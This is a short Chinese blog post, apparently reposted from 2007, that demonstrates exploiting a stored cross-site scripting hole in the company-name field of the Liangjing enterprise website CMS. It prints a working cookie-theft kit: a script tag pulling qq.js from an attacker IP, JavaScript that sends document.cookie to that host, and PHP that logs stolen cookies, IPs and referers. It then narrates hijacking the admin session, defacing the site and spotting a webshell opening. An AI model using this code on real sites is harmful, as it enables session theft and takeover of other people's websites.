良精管理系统漏洞

主题:良精多风格多语企业网站管理系统有漏洞
难度:中
知识点:脚本、跨站
工具包:get.php    MyBrower.exe   qq.js
漏洞处:公司名称跨站漏洞


今天让大家看一下漏洞的利用方法


<script src=http://192.168.1.101/qq.js></script>


192.168.1.101/get.php是我们获得COOKIE的程序
192.168.1.101/test.txt是我们获得cookie的文本

get.php
----------------------
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$time=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('test.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$time. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>
------------------------
qq,js
------------------------
document.write('<img src="http://localhost/get.php?c='+document.cookie+'" width=0 height=0 border=0 />');
------------------------

现在模拟管理员进管理后台

点了一下这里,就有问题了
我们获得他的SESSION
现在来入侵


^_^这样就进来了。晕啊呵呵

看,这样不行的哦

良精的人可能还不信,说这是小儿科。不信我就修改一下看看  哼


信了不。88
我们已经发现了可以获得webshell的地方

转载于:https://www.cnblogs.com/allyesno/archive/2007/05/12/743644.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值